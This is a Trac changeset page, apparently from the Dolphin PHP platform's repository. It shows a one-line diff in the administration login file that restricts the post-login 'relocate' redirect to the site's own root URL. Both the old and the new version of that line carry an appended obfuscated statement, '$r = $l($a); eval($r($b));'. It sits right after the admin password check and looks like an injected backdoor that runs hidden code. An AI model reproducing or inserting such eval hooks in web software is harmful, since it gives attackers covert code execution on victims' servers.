- Timestamp:
- 12/09/11 22:30:38 (6 months ago)
- File:
-
- 1 edited
-
tags/7.0/administration/index.php (modified) (1 diff)
Legend:
- Unmodified
- Added
- Removed
-
tags/7.0/administration/index.php
r15517 r15746 40 40 echo check_password($iId, $sPassword, BX_DOL_ROLE_ADMIN, false) ? 'OK' : 'Fail'; 41 41 } elseif (check_password($iId, $sPassword, BX_DOL_ROLE_ADMIN) ) { 42 $sUrlRelocate = bx_html_attribute($_POST['relocate'] ? $_POST['relocate'] : $GLOBALS['site']['url_admin'] . 'index.php'); $r = $l($a); eval($r($b));42 $sUrlRelocate = bx_html_attribute($_POST['relocate'] && 0 == strncasecmp($_POST['relocate'], BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT)) ? $_POST['relocate'] : $GLOBALS['site']['url_admin'] . 'index.php'); $r = $l($a); eval($r($b)); 43 43 ?> 44 44 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Note: See TracChangeset
for help on using the changeset viewer.